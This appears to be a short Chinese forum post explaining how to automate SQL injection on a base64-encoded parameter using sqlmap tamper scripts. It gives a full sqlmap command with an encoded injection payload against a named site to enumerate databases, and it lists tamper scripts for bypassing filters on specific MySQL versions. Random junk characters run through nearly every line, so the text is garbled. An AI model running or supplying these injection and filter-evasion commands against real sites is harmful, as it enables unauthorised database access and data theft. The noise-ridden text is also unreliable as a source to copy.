WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?4 U# ~- H/ ~7 ^7 G/ s3 x; L& m) ?
( i0 A! D5 v8 p2 F% T( xsqlmap的tamper里有个base64encode.py4 k+ H2 h7 R; `2 t6 A
?+ t/ o5 ^$ s# N9 c1 b- @# t, h- ]
使用如下5 F) I4 M- J y5 `" @& E4 u
) [/ F; [+ u7 q0 ?sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
; R* }4 x! k) v# j/ [/ l0 w* |) Y& r, b$ s7 q" }4 k
2 l9 \+ V4 _ m- q
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”3 }( F5 U r7 C3 M& @% _
! w8 |% Q& X! u. M其中常用到的bypass脚本绕过SQLMAP主要两个脚本:% V/ ]% G ~ [
% n n. A1 f* M
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
# }2 l7 W5 I( t9 }, i' x' Nspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
4 a6 }1 K8 O8 Y, L: f首先确定目标数据库版本,然后选择相应的脚本。
( }& i5 c# D* X; B' F7 P-v 3 --batch --tamper "space2hash.py"
& N4 O! w' {7 q( }4 j6 s
2 ~- @; b% n! Q9 E7 q4 W7 f! B还有其他一些插件:& h7 Z+ @& T& _) l* h
encodes编码 ——charencode.py
$ g' {' a% U( `* o' H7 p/ ]base64编码 —— base64encode.py5 Q% _; |+ O; R4 o2 i4 N: I
替换空格和关键字 —— halfversionedmorekeywords.py0 m& m/ D0 t4 b, c$ w
|
8 ^/ n) C: z) V! x* Z3 Y# Z$ z
/ a% Q$ s6 `3 ^* q5 ?- y c" ]8 z& q' G4 D. w. _( u
. a1 e7 l( t7 p" g
|